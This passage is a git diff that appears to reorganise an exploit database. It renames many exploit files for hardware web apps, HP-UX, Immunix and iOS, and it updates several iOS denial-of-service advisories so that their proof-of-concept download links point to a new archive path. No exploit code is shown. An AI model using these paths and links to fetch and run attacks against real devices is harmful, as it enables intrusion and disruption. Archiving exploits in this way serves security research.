a/platforms/hardware/webapps/41360.rb b/exploits/hardware/webapps/41360.rb similarity index 100% rename from platforms/hardware/webapps/41360.rb rename to exploits/hardware/webapps/41360.rb diff --git a/platforms/hardware/webapps/41361.txt b/exploits/hardware/webapps/41361.txt similarity index 100% rename from platforms/hardware/webapps/41361.txt rename to exploits/hardware/webapps/41361.txt diff --git a/platforms/hardware/webapps/41394.py b/exploits/hardware/webapps/41394.py similarity index 100% rename from platforms/hardware/webapps/41394.py rename to exploits/hardware/webapps/41394.py diff --git a/platforms/hardware/webapps/41402.txt b/exploits/hardware/webapps/41402.txt similarity index 100% rename from platforms/hardware/webapps/41402.txt rename to exploits/hardware/webapps/41402.txt diff --git a/platforms/hardware/webapps/41404.html b/exploits/hardware/webapps/41404.html similarity index 100% rename from platforms/hardware/webapps/41404.html rename to exploits/hardware/webapps/41404.html diff --git a/platforms/hardware/webapps/41415.rb b/exploits/hardware/webapps/41415.rb similarity index 100% rename from platforms/hardware/webapps/41415.rb rename to exploits/hardware/webapps/41415.rb diff --git a/platforms/hardware/webapps/41416.rb b/exploits/hardware/webapps/41416.rb similarity index 100% rename from platforms/hardware/webapps/41416.rb rename to exploits/hardware/webapps/41416.rb diff --git a/platforms/hardware/webapps/41459.py b/exploits/hardware/webapps/41459.py similarity index 100% rename from platforms/hardware/webapps/41459.py rename to exploits/hardware/webapps/41459.py diff --git a/platforms/hardware/webapps/41472.html b/exploits/hardware/webapps/41472.html similarity index 100% rename from platforms/hardware/webapps/41472.html rename to exploits/hardware/webapps/41472.html diff --git a/platforms/hardware/webapps/41478.txt b/exploits/hardware/webapps/41478.txt similarity index 100% rename from platforms/hardware/webapps/41478.txt rename to exploits/hardware/webapps/41478.txt diff --git a/platforms/hardware/webapps/41502.txt b/exploits/hardware/webapps/41502.txt similarity index 100% rename from platforms/hardware/webapps/41502.txt rename to exploits/hardware/webapps/41502.txt diff --git a/platforms/hardware/webapps/41571.txt b/exploits/hardware/webapps/41571.txt similarity index 100% rename from platforms/hardware/webapps/41571.txt rename to exploits/hardware/webapps/41571.txt diff --git a/platforms/hardware/webapps/41572.txt b/exploits/hardware/webapps/41572.txt similarity index 100% rename from platforms/hardware/webapps/41572.txt rename to exploits/hardware/webapps/41572.txt diff --git a/platforms/hardware/webapps/41573.txt b/exploits/hardware/webapps/41573.txt similarity index 100% rename from platforms/hardware/webapps/41573.txt rename to exploits/hardware/webapps/41573.txt diff --git a/platforms/hardware/webapps/41625.txt b/exploits/hardware/webapps/41625.txt similarity index 100% rename from platforms/hardware/webapps/41625.txt rename to exploits/hardware/webapps/41625.txt diff --git a/platforms/hardware/webapps/41626.txt b/exploits/hardware/webapps/41626.txt similarity index 100% rename from platforms/hardware/webapps/41626.txt rename to exploits/hardware/webapps/41626.txt diff --git a/platforms/hardware/webapps/41633.txt b/exploits/hardware/webapps/41633.txt similarity index 100% rename from platforms/hardware/webapps/41633.txt rename to exploits/hardware/webapps/41633.txt diff --git a/platforms/hardware/webapps/41662.py b/exploits/hardware/webapps/41662.py similarity index 100% rename from platforms/hardware/webapps/41662.py rename to exploits/hardware/webapps/41662.py diff --git a/platforms/hardware/webapps/41671.txt b/exploits/hardware/webapps/41671.txt similarity index 100% rename from platforms/hardware/webapps/41671.txt rename to exploits/hardware/webapps/41671.txt diff --git a/platforms/hardware/webapps/41782.txt b/exploits/hardware/webapps/41782.txt similarity index 100% rename from platforms/hardware/webapps/41782.txt rename to exploits/hardware/webapps/41782.txt diff --git a/platforms/hardware/webapps/41821.txt b/exploits/hardware/webapps/41821.txt similarity index 100% rename from platforms/hardware/webapps/41821.txt rename to exploits/hardware/webapps/41821.txt diff --git a/platforms/hardware/webapps/41829.txt b/exploits/hardware/webapps/41829.txt similarity index 100% rename from platforms/hardware/webapps/41829.txt rename to exploits/hardware/webapps/41829.txt diff --git a/platforms/hardware/webapps/41840.txt b/exploits/hardware/webapps/41840.txt similarity index 100% rename from platforms/hardware/webapps/41840.txt rename to exploits/hardware/webapps/41840.txt diff --git a/platforms/hardware/webapps/41863.php b/exploits/hardware/webapps/41863.php similarity index 100% rename from platforms/hardware/webapps/41863.php rename to exploits/hardware/webapps/41863.php diff --git a/platforms/hardware/webapps/41998.txt b/exploits/hardware/webapps/41998.txt similarity index 100% rename from platforms/hardware/webapps/41998.txt rename to exploits/hardware/webapps/41998.txt diff --git a/platforms/hardware/webapps/42013.txt b/exploits/hardware/webapps/42013.txt similarity index 100% rename from platforms/hardware/webapps/42013.txt rename to exploits/hardware/webapps/42013.txt diff --git a/platforms/hardware/webapps/42039.txt b/exploits/hardware/webapps/42039.txt similarity index 100% rename from platforms/hardware/webapps/42039.txt rename to exploits/hardware/webapps/42039.txt diff --git a/platforms/hardware/webapps/42062.txt b/exploits/hardware/webapps/42062.txt similarity index 100% rename from platforms/hardware/webapps/42062.txt rename to exploits/hardware/webapps/42062.txt diff --git a/platforms/hardware/webapps/42074.txt b/exploits/hardware/webapps/42074.txt similarity index 100% rename from platforms/hardware/webapps/42074.txt rename to exploits/hardware/webapps/42074.txt diff --git a/platforms/hardware/webapps/42075.txt b/exploits/hardware/webapps/42075.txt similarity index 100% rename from platforms/hardware/webapps/42075.txt rename to exploits/hardware/webapps/42075.txt diff --git a/platforms/hardware/webapps/42085.py b/exploits/hardware/webapps/42085.py similarity index 100% rename from platforms/hardware/webapps/42085.py rename to exploits/hardware/webapps/42085.py diff --git a/platforms/hardware/webapps/42114.py b/exploits/hardware/webapps/42114.py similarity index 100% rename from platforms/hardware/webapps/42114.py rename to exploits/hardware/webapps/42114.py diff --git a/platforms/hardware/webapps/42150.py b/exploits/hardware/webapps/42150.py similarity index 100% rename from platforms/hardware/webapps/42150.py rename to exploits/hardware/webapps/42150.py diff --git a/platforms/hardware/webapps/42178.py b/exploits/hardware/webapps/42178.py similarity index 100% rename from platforms/hardware/webapps/42178.py rename to exploits/hardware/webapps/42178.py diff --git a/platforms/hardware/webapps/42192.sh b/exploits/hardware/webapps/42192.sh similarity index 100% rename from platforms/hardware/webapps/42192.sh rename to exploits/hardware/webapps/42192.sh diff --git a/platforms/hardware/webapps/42194.sh b/exploits/hardware/webapps/42194.sh similarity index 100% rename from platforms/hardware/webapps/42194.sh rename to exploits/hardware/webapps/42194.sh diff --git a/platforms/hardware/webapps/42195.sh b/exploits/hardware/webapps/42195.sh similarity index 100% rename from platforms/hardware/webapps/42195.sh rename to exploits/hardware/webapps/42195.sh diff --git a/platforms/hardware/webapps/42196.sh b/exploits/hardware/webapps/42196.sh similarity index 100% rename from platforms/hardware/webapps/42196.sh rename to exploits/hardware/webapps/42196.sh diff --git a/platforms/hardware/webapps/42197.sh b/exploits/hardware/webapps/42197.sh similarity index 100% rename from platforms/hardware/webapps/42197.sh rename to exploits/hardware/webapps/42197.sh diff --git a/platforms/hardware/webapps/42252.txt b/exploits/hardware/webapps/42252.txt similarity index 100% rename from platforms/hardware/webapps/42252.txt rename to exploits/hardware/webapps/42252.txt diff --git a/platforms/hardware/webapps/42284.py b/exploits/hardware/webapps/42284.py similarity index 100% rename from platforms/hardware/webapps/42284.py rename to exploits/hardware/webapps/42284.py diff --git a/platforms/hardware/webapps/42293.txt b/exploits/hardware/webapps/42293.txt similarity index 100% rename from platforms/hardware/webapps/42293.txt rename to exploits/hardware/webapps/42293.txt diff --git a/platforms/hardware/webapps/42307.txt b/exploits/hardware/webapps/42307.txt similarity index 100% rename from platforms/hardware/webapps/42307.txt rename to exploits/hardware/webapps/42307.txt diff --git a/platforms/hardware/webapps/42308.txt b/exploits/hardware/webapps/42308.txt similarity index 100% rename from platforms/hardware/webapps/42308.txt rename to exploits/hardware/webapps/42308.txt diff --git a/platforms/hardware/webapps/42309.txt b/exploits/hardware/webapps/42309.txt similarity index 100% rename from platforms/hardware/webapps/42309.txt rename to exploits/hardware/webapps/42309.txt diff --git a/platforms/hardware/webapps/42313.txt b/exploits/hardware/webapps/42313.txt similarity index 100% rename from platforms/hardware/webapps/42313.txt rename to exploits/hardware/webapps/42313.txt diff --git a/platforms/hardware/webapps/42320.txt b/exploits/hardware/webapps/42320.txt similarity index 100% rename from platforms/hardware/webapps/42320.txt rename to exploits/hardware/webapps/42320.txt diff --git a/platforms/hardware/webapps/42321.txt b/exploits/hardware/webapps/42321.txt similarity index 100% rename from platforms/hardware/webapps/42321.txt rename to exploits/hardware/webapps/42321.txt diff --git a/platforms/hardware/webapps/42322.txt b/exploits/hardware/webapps/42322.txt similarity index 100% rename from platforms/hardware/webapps/42322.txt rename to exploits/hardware/webapps/42322.txt diff --git a/platforms/hardware/webapps/42323.txt b/exploits/hardware/webapps/42323.txt similarity index 100% rename from platforms/hardware/webapps/42323.txt rename to exploits/hardware/webapps/42323.txt diff --git a/platforms/hardware/webapps/42326.txt b/exploits/hardware/webapps/42326.txt similarity index 100% rename from platforms/hardware/webapps/42326.txt rename to exploits/hardware/webapps/42326.txt diff --git a/platforms/hardware/webapps/42333.rb b/exploits/hardware/webapps/42333.rb similarity index 100% rename from platforms/hardware/webapps/42333.rb rename to exploits/hardware/webapps/42333.rb diff --git a/platforms/hardware/webapps/42352.txt b/exploits/hardware/webapps/42352.txt similarity index 100% rename from platforms/hardware/webapps/42352.txt rename to exploits/hardware/webapps/42352.txt diff --git a/platforms/hardware/webapps/42388.txt b/exploits/hardware/webapps/42388.txt similarity index 100% rename from platforms/hardware/webapps/42388.txt rename to exploits/hardware/webapps/42388.txt diff --git a/platforms/hardware/webapps/42408.txt b/exploits/hardware/webapps/42408.txt similarity index 100% rename from platforms/hardware/webapps/42408.txt rename to exploits/hardware/webapps/42408.txt diff --git a/platforms/hardware/webapps/42427.html b/exploits/hardware/webapps/42427.html similarity index 100% rename from platforms/hardware/webapps/42427.html rename to exploits/hardware/webapps/42427.html diff --git a/platforms/hardware/webapps/42434.py b/exploits/hardware/webapps/42434.py similarity index 100% rename from platforms/hardware/webapps/42434.py rename to exploits/hardware/webapps/42434.py diff --git a/platforms/hardware/webapps/42449.html b/exploits/hardware/webapps/42449.html similarity index 100% rename from platforms/hardware/webapps/42449.html rename to exploits/hardware/webapps/42449.html diff --git a/platforms/hardware/webapps/42450.php b/exploits/hardware/webapps/42450.php similarity index 100% rename from platforms/hardware/webapps/42450.php rename to exploits/hardware/webapps/42450.php diff --git a/platforms/hardware/webapps/42547.py b/exploits/hardware/webapps/42547.py similarity index 100% rename from platforms/hardware/webapps/42547.py rename to exploits/hardware/webapps/42547.py diff --git a/platforms/hardware/webapps/42581.txt b/exploits/hardware/webapps/42581.txt similarity index 100% rename from platforms/hardware/webapps/42581.txt rename to exploits/hardware/webapps/42581.txt diff --git a/platforms/hardware/webapps/42588.txt b/exploits/hardware/webapps/42588.txt similarity index 100% rename from platforms/hardware/webapps/42588.txt rename to exploits/hardware/webapps/42588.txt diff --git a/platforms/hardware/webapps/42608.txt b/exploits/hardware/webapps/42608.txt similarity index 100% rename from platforms/hardware/webapps/42608.txt rename to exploits/hardware/webapps/42608.txt diff --git a/platforms/hardware/webapps/42633.txt b/exploits/hardware/webapps/42633.txt similarity index 100% rename from platforms/hardware/webapps/42633.txt rename to exploits/hardware/webapps/42633.txt diff --git a/platforms/hardware/webapps/42634.txt b/exploits/hardware/webapps/42634.txt similarity index 100% rename from platforms/hardware/webapps/42634.txt rename to exploits/hardware/webapps/42634.txt diff --git a/platforms/hardware/webapps/42649.txt b/exploits/hardware/webapps/42649.txt similarity index 100% rename from platforms/hardware/webapps/42649.txt rename to exploits/hardware/webapps/42649.txt diff --git a/platforms/hardware/webapps/42651.txt b/exploits/hardware/webapps/42651.txt similarity index 100% rename from platforms/hardware/webapps/42651.txt rename to exploits/hardware/webapps/42651.txt diff --git a/platforms/hardware/webapps/42729.py b/exploits/hardware/webapps/42729.py similarity index 100% rename from platforms/hardware/webapps/42729.py rename to exploits/hardware/webapps/42729.py diff --git a/platforms/hardware/webapps/42730.py b/exploits/hardware/webapps/42730.py similarity index 100% rename from platforms/hardware/webapps/42730.py rename to exploits/hardware/webapps/42730.py diff --git a/platforms/hardware/webapps/42731.sh b/exploits/hardware/webapps/42731.sh similarity index 100% rename from platforms/hardware/webapps/42731.sh rename to exploits/hardware/webapps/42731.sh diff --git a/platforms/hardware/webapps/42732.py b/exploits/hardware/webapps/42732.py similarity index 100% rename from platforms/hardware/webapps/42732.py rename to exploits/hardware/webapps/42732.py diff --git a/platforms/hardware/webapps/42739.txt b/exploits/hardware/webapps/42739.txt similarity index 100% rename from platforms/hardware/webapps/42739.txt rename to exploits/hardware/webapps/42739.txt diff --git a/platforms/hardware/webapps/42740.txt b/exploits/hardware/webapps/42740.txt similarity index 100% rename from platforms/hardware/webapps/42740.txt rename to exploits/hardware/webapps/42740.txt diff --git a/platforms/hardware/webapps/42785.sh b/exploits/hardware/webapps/42785.sh similarity index 100% rename from platforms/hardware/webapps/42785.sh rename to exploits/hardware/webapps/42785.sh diff --git a/platforms/hardware/webapps/42786.txt b/exploits/hardware/webapps/42786.txt similarity index 100% rename from platforms/hardware/webapps/42786.txt rename to exploits/hardware/webapps/42786.txt diff --git a/platforms/hardware/webapps/42788.txt b/exploits/hardware/webapps/42788.txt similarity index 100% rename from platforms/hardware/webapps/42788.txt rename to exploits/hardware/webapps/42788.txt diff --git a/platforms/hardware/webapps/42789.txt b/exploits/hardware/webapps/42789.txt similarity index 100% rename from platforms/hardware/webapps/42789.txt rename to exploits/hardware/webapps/42789.txt diff --git a/platforms/hardware/webapps/42916.py b/exploits/hardware/webapps/42916.py similarity index 100% rename from platforms/hardware/webapps/42916.py rename to exploits/hardware/webapps/42916.py diff --git a/platforms/hardware/webapps/42931.txt b/exploits/hardware/webapps/42931.txt similarity index 100% rename from platforms/hardware/webapps/42931.txt rename to exploits/hardware/webapps/42931.txt diff --git a/platforms/hardware/webapps/42933.txt b/exploits/hardware/webapps/42933.txt similarity index 100% rename from platforms/hardware/webapps/42933.txt rename to exploits/hardware/webapps/42933.txt diff --git a/platforms/hardware/webapps/42947.txt b/exploits/hardware/webapps/42947.txt similarity index 100% rename from platforms/hardware/webapps/42947.txt rename to exploits/hardware/webapps/42947.txt diff --git a/platforms/hardware/webapps/42956.txt b/exploits/hardware/webapps/42956.txt similarity index 100% rename from platforms/hardware/webapps/42956.txt rename to exploits/hardware/webapps/42956.txt diff --git a/platforms/hardware/webapps/42986.txt b/exploits/hardware/webapps/42986.txt similarity index 100% rename from platforms/hardware/webapps/42986.txt rename to exploits/hardware/webapps/42986.txt diff --git a/platforms/hardware/webapps/43022.py b/exploits/hardware/webapps/43022.py similarity index 100% rename from platforms/hardware/webapps/43022.py rename to exploits/hardware/webapps/43022.py diff --git a/platforms/hardware/webapps/43023.txt b/exploits/hardware/webapps/43023.txt similarity index 100% rename from platforms/hardware/webapps/43023.txt rename to exploits/hardware/webapps/43023.txt diff --git a/platforms/hardware/webapps/43146.txt b/exploits/hardware/webapps/43146.txt similarity index 100% rename from platforms/hardware/webapps/43146.txt rename to exploits/hardware/webapps/43146.txt diff --git a/platforms/hardware/webapps/43148.txt b/exploits/hardware/webapps/43148.txt similarity index 100% rename from platforms/hardware/webapps/43148.txt rename to exploits/hardware/webapps/43148.txt diff --git a/platforms/hardware/webapps/43150.html b/exploits/hardware/webapps/43150.html similarity index 100% rename from platforms/hardware/webapps/43150.html rename to exploits/hardware/webapps/43150.html diff --git a/platforms/hardware/webapps/43158.txt b/exploits/hardware/webapps/43158.txt similarity index 100% rename from platforms/hardware/webapps/43158.txt rename to exploits/hardware/webapps/43158.txt diff --git a/platforms/hardware/webapps/9975.txt b/exploits/hardware/webapps/9975.txt similarity index 100% rename from platforms/hardware/webapps/9975.txt rename to exploits/hardware/webapps/9975.txt diff --git a/platforms/hardware/webapps/9981.txt b/exploits/hardware/webapps/9981.txt similarity index 100% rename from platforms/hardware/webapps/9981.txt rename to exploits/hardware/webapps/9981.txt diff --git a/platforms/hp-ux/dos/19278.pl b/exploits/hp-ux/dos/19278.pl similarity index 100% rename from platforms/hp-ux/dos/19278.pl rename to exploits/hp-ux/dos/19278.pl diff --git a/platforms/hp-ux/dos/195.sh b/exploits/hp-ux/dos/195.sh similarity index 100% rename from platforms/hp-ux/dos/195.sh rename to exploits/hp-ux/dos/195.sh diff --git a/platforms/hp-ux/dos/20373.txt b/exploits/hp-ux/dos/20373.txt similarity index 100% rename from platforms/hp-ux/dos/20373.txt rename to exploits/hp-ux/dos/20373.txt diff --git a/platforms/hp-ux/dos/212.c b/exploits/hp-ux/dos/212.c similarity index 100% rename from platforms/hp-ux/dos/212.c rename to exploits/hp-ux/dos/212.c diff --git a/platforms/hp-ux/dos/22552.txt b/exploits/hp-ux/dos/22552.txt similarity index 100% rename from platforms/hp-ux/dos/22552.txt rename to exploits/hp-ux/dos/22552.txt diff --git a/platforms/hp-ux/dos/22561.txt b/exploits/hp-ux/dos/22561.txt similarity index 100% rename from platforms/hp-ux/dos/22561.txt rename to exploits/hp-ux/dos/22561.txt diff --git a/platforms/hp-ux/dos/23236.txt b/exploits/hp-ux/dos/23236.txt similarity index 100% rename from platforms/hp-ux/dos/23236.txt rename to exploits/hp-ux/dos/23236.txt diff --git a/platforms/hp-ux/local/134.c b/exploits/hp-ux/local/134.c similarity index 100% rename from platforms/hp-ux/local/134.c rename to exploits/hp-ux/local/134.c diff --git a/platforms/hp-ux/local/19535.pl b/exploits/hp-ux/local/19535.pl similarity index 100% rename from platforms/hp-ux/local/19535.pl rename to exploits/hp-ux/local/19535.pl diff --git a/platforms/hp-ux/local/199.c b/exploits/hp-ux/local/199.c similarity index 100% rename from platforms/hp-ux/local/199.c rename to exploits/hp-ux/local/199.c diff --git a/platforms/hp-ux/local/19990.txt b/exploits/hp-ux/local/19990.txt similarity index 100% rename from platforms/hp-ux/local/19990.txt rename to exploits/hp-ux/local/19990.txt diff --git a/platforms/hp-ux/local/20002.txt b/exploits/hp-ux/local/20002.txt similarity index 100% rename from platforms/hp-ux/local/20002.txt rename to exploits/hp-ux/local/20002.txt diff --git a/platforms/hp-ux/local/20162.txt b/exploits/hp-ux/local/20162.txt similarity index 100% rename from platforms/hp-ux/local/20162.txt rename to exploits/hp-ux/local/20162.txt diff --git a/platforms/hp-ux/local/20329.sh b/exploits/hp-ux/local/20329.sh similarity index 100% rename from platforms/hp-ux/local/20329.sh rename to exploits/hp-ux/local/20329.sh diff --git a/platforms/hp-ux/local/20386.txt b/exploits/hp-ux/local/20386.txt similarity index 100% rename from platforms/hp-ux/local/20386.txt rename to exploits/hp-ux/local/20386.txt diff --git a/platforms/hp-ux/local/20396.sh b/exploits/hp-ux/local/20396.sh similarity index 100% rename from platforms/hp-ux/local/20396.sh rename to exploits/hp-ux/local/20396.sh diff --git a/platforms/hp-ux/local/20724.txt b/exploits/hp-ux/local/20724.txt similarity index 100% rename from platforms/hp-ux/local/20724.txt rename to exploits/hp-ux/local/20724.txt diff --git a/platforms/hp-ux/local/21098.c b/exploits/hp-ux/local/21098.c similarity index 100% rename from platforms/hp-ux/local/21098.c rename to exploits/hp-ux/local/21098.c diff --git a/platforms/hp-ux/local/21577.c b/exploits/hp-ux/local/21577.c similarity index 100% rename from platforms/hp-ux/local/21577.c rename to exploits/hp-ux/local/21577.c diff --git a/platforms/hp-ux/local/22231.txt b/exploits/hp-ux/local/22231.txt similarity index 100% rename from platforms/hp-ux/local/22231.txt rename to exploits/hp-ux/local/22231.txt diff --git a/platforms/hp-ux/local/22246.c b/exploits/hp-ux/local/22246.c similarity index 100% rename from platforms/hp-ux/local/22246.c rename to exploits/hp-ux/local/22246.c diff --git a/platforms/hp-ux/local/22247.sh b/exploits/hp-ux/local/22247.sh similarity index 100% rename from platforms/hp-ux/local/22247.sh rename to exploits/hp-ux/local/22247.sh diff --git a/platforms/hp-ux/local/22248.sh b/exploits/hp-ux/local/22248.sh similarity index 100% rename from platforms/hp-ux/local/22248.sh rename to exploits/hp-ux/local/22248.sh diff --git a/platforms/hp-ux/local/23341.c b/exploits/hp-ux/local/23341.c similarity index 100% rename from platforms/hp-ux/local/23341.c rename to exploits/hp-ux/local/23341.c diff --git a/platforms/hp-ux/local/23342.c b/exploits/hp-ux/local/23342.c similarity index 100% rename from platforms/hp-ux/local/23342.c rename to exploits/hp-ux/local/23342.c diff --git a/platforms/hp-ux/local/23343.c b/exploits/hp-ux/local/23343.c similarity index 100% rename from platforms/hp-ux/local/23343.c rename to exploits/hp-ux/local/23343.c diff --git a/platforms/hp-ux/local/24210.pl b/exploits/hp-ux/local/24210.pl similarity index 100% rename from platforms/hp-ux/local/24210.pl rename to exploits/hp-ux/local/24210.pl diff --git a/platforms/hp-ux/local/245.c b/exploits/hp-ux/local/245.c similarity index 100% rename from platforms/hp-ux/local/245.c rename to exploits/hp-ux/local/245.c diff --git a/platforms/hp-ux/local/2633.c b/exploits/hp-ux/local/2633.c similarity index 100% rename from platforms/hp-ux/local/2633.c rename to exploits/hp-ux/local/2633.c diff --git a/platforms/hp-ux/local/2634.c b/exploits/hp-ux/local/2634.c similarity index 100% rename from platforms/hp-ux/local/2634.c rename to exploits/hp-ux/local/2634.c diff --git a/platforms/hp-ux/local/2635.c b/exploits/hp-ux/local/2635.c similarity index 100% rename from platforms/hp-ux/local/2635.c rename to exploits/hp-ux/local/2635.c diff --git a/platforms/hp-ux/local/2636.c b/exploits/hp-ux/local/2636.c similarity index 100% rename from platforms/hp-ux/local/2636.c rename to exploits/hp-ux/local/2636.c diff --git a/platforms/hp-ux/local/28984.pl b/exploits/hp-ux/local/28984.pl similarity index 100% rename from platforms/hp-ux/local/28984.pl rename to exploits/hp-ux/local/28984.pl diff --git a/platforms/hp-ux/local/482.c b/exploits/hp-ux/local/482.c similarity index 100% rename from platforms/hp-ux/local/482.c rename to exploits/hp-ux/local/482.c diff --git a/platforms/hp-ux/remote/10034.rb b/exploits/hp-ux/remote/10034.rb similarity index 100% rename from platforms/hp-ux/remote/10034.rb rename to exploits/hp-ux/remote/10034.rb diff --git a/platforms/hp-ux/remote/1259.pm b/exploits/hp-ux/remote/1259.pm similarity index 100% rename from platforms/hp-ux/remote/1259.pm rename to exploits/hp-ux/remote/1259.pm diff --git a/platforms/hp-ux/remote/1261.pm b/exploits/hp-ux/remote/1261.pm similarity index 100% rename from platforms/hp-ux/remote/1261.pm rename to exploits/hp-ux/remote/1261.pm diff --git a/platforms/hp-ux/remote/16927.rb b/exploits/hp-ux/remote/16927.rb similarity index 100% rename from platforms/hp-ux/remote/16927.rb rename to exploits/hp-ux/remote/16927.rb diff --git a/platforms/hp-ux/remote/17614.sh b/exploits/hp-ux/remote/17614.sh similarity index 100% rename from platforms/hp-ux/remote/17614.sh rename to exploits/hp-ux/remote/17614.sh diff --git a/platforms/hp-ux/remote/22733.c b/exploits/hp-ux/remote/22733.c similarity index 100% rename from platforms/hp-ux/remote/22733.c rename to exploits/hp-ux/remote/22733.c diff --git a/platforms/hp-ux/remote/35961.py b/exploits/hp-ux/remote/35961.py similarity index 100% rename from platforms/hp-ux/remote/35961.py rename to exploits/hp-ux/remote/35961.py diff --git a/platforms/hp-ux/remote/977.c b/exploits/hp-ux/remote/977.c similarity index 100% rename from platforms/hp-ux/remote/977.c rename to exploits/hp-ux/remote/977.c diff --git a/platforms/immunix/local/19875.txt b/exploits/immunix/local/19875.txt similarity index 100% rename from platforms/immunix/local/19875.txt rename to exploits/immunix/local/19875.txt diff --git a/platforms/immunix/local/20187.c b/exploits/immunix/local/20187.c similarity index 100% rename from platforms/immunix/local/20187.c rename to exploits/immunix/local/20187.c diff --git a/platforms/ios/dos/11117.py b/exploits/ios/dos/11117.py similarity index 100% rename from platforms/ios/dos/11117.py rename to exploits/ios/dos/11117.py diff --git a/platforms/ios/dos/11273.py b/exploits/ios/dos/11273.py similarity index 100% rename from platforms/ios/dos/11273.py rename to exploits/ios/dos/11273.py diff --git a/platforms/ios/dos/11467.py b/exploits/ios/dos/11467.py similarity index 100% rename from platforms/ios/dos/11467.py rename to exploits/ios/dos/11467.py diff --git a/platforms/ios/dos/11472.py b/exploits/ios/dos/11472.py similarity index 100% rename from platforms/ios/dos/11472.py rename to exploits/ios/dos/11472.py diff --git a/platforms/ios/dos/11499.pl b/exploits/ios/dos/11499.pl similarity index 100% rename from platforms/ios/dos/11499.pl rename to exploits/ios/dos/11499.pl diff --git a/platforms/ios/dos/11520.pl b/exploits/ios/dos/11520.pl similarity index 100% rename from platforms/ios/dos/11520.pl rename to exploits/ios/dos/11520.pl diff --git a/platforms/ios/dos/11890.txt b/exploits/ios/dos/11890.txt similarity index 100% rename from platforms/ios/dos/11890.txt rename to exploits/ios/dos/11890.txt diff --git a/platforms/ios/dos/11891.txt b/exploits/ios/dos/11891.txt similarity index 100% rename from platforms/ios/dos/11891.txt rename to exploits/ios/dos/11891.txt diff --git a/platforms/ios/dos/13870.py b/exploits/ios/dos/13870.py similarity index 100% rename from platforms/ios/dos/13870.py rename to exploits/ios/dos/13870.py diff --git a/platforms/ios/dos/13871.py b/exploits/ios/dos/13871.py similarity index 100% rename from platforms/ios/dos/13871.py rename to exploits/ios/dos/13871.py diff --git a/platforms/ios/dos/15188.py b/exploits/ios/dos/15188.py similarity index 100% rename from platforms/ios/dos/15188.py rename to exploits/ios/dos/15188.py diff --git a/platforms/ios/dos/18931.rb b/exploits/ios/dos/18931.rb similarity index 100% rename from platforms/ios/dos/18931.rb rename to exploits/ios/dos/18931.rb diff --git a/platforms/ios/dos/31057.html b/exploits/ios/dos/31057.html similarity index 100% rename from platforms/ios/dos/31057.html rename to exploits/ios/dos/31057.html diff --git a/platforms/ios/dos/32333.txt b/exploits/ios/dos/32333.txt similarity index 100% rename from platforms/ios/dos/32333.txt rename to exploits/ios/dos/32333.txt diff --git a/platforms/ios/dos/36903.txt b/exploits/ios/dos/36903.txt similarity index 100% rename from platforms/ios/dos/36903.txt rename to exploits/ios/dos/36903.txt diff --git a/platforms/ios/dos/37660.txt b/exploits/ios/dos/37660.txt similarity index 100% rename from platforms/ios/dos/37660.txt rename to exploits/ios/dos/37660.txt diff --git a/platforms/ios/dos/37997.txt b/exploits/ios/dos/37997.txt similarity index 100% rename from platforms/ios/dos/37997.txt rename to exploits/ios/dos/37997.txt diff --git a/platforms/ios/dos/38032.pl b/exploits/ios/dos/38032.pl similarity index 100% rename from platforms/ios/dos/38032.pl rename to exploits/ios/dos/38032.pl diff --git a/platforms/ios/dos/38337.txt b/exploits/ios/dos/38337.txt similarity index 100% rename from platforms/ios/dos/38337.txt rename to exploits/ios/dos/38337.txt diff --git a/platforms/ios/dos/39359.txt b/exploits/ios/dos/39359.txt similarity index 87% rename from platforms/ios/dos/39359.txt rename to exploits/ios/dos/39359.txt index eac7a6653..a767c68ea 100644 --- a/platforms/ios/dos/39359.txt +++ b/exploits/ios/dos/39359.txt @@ -6,4 +6,4 @@ OS X advisory: https://support.apple.com/en-us/HT205731 iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39359.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39359.zip \ No newline at end of file diff --git a/platforms/ios/dos/39360.txt b/exploits/ios/dos/39360.txt similarity index 87% rename from platforms/ios/dos/39360.txt rename to exploits/ios/dos/39360.txt index b8e80b51b..6745152f3 100644 --- a/platforms/ios/dos/39360.txt +++ b/exploits/ios/dos/39360.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39360.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39360.zip \ No newline at end of file diff --git a/platforms/ios/dos/39361.txt b/exploits/ios/dos/39361.txt similarity index 87% rename from platforms/ios/dos/39361.txt rename to exploits/ios/dos/39361.txt index dc98db53a..16e6a541e 100644 --- a/platforms/ios/dos/39361.txt +++ b/exploits/ios/dos/39361.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39361.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39361.zip \ No newline at end of file diff --git a/platforms/ios/dos/39362.txt b/exploits/ios/dos/39362.txt similarity index 87% rename from platforms/ios/dos/39362.txt rename to exploits/ios/dos/39362.txt index 368285b6a..312663099 100644 --- a/platforms/ios/dos/39362.txt +++ b/exploits/ios/dos/39362.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39362.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39362.zip \ No newline at end of file diff --git a/platforms/ios/dos/39363.txt b/exploits/ios/dos/39363.txt similarity index 87% rename from platforms/ios/dos/39363.txt rename to exploits/ios/dos/39363.txt index f47653010..82565db54 100644 --- a/platforms/ios/dos/39363.txt +++ b/exploits/ios/dos/39363.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39363.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39363.zip \ No newline at end of file diff --git a/platforms/ios/dos/39364.txt b/exploits/ios/dos/39364.txt similarity index 87% rename from platforms/ios/dos/39364.txt rename to exploits/ios/dos/39364.txt index 639545355..f8cfdbf2e 100644 --- a/platforms/ios/dos/39364.txt +++ b/exploits/ios/dos/39364.txt @@ -7,4 +7,4 @@ iOS advisory: 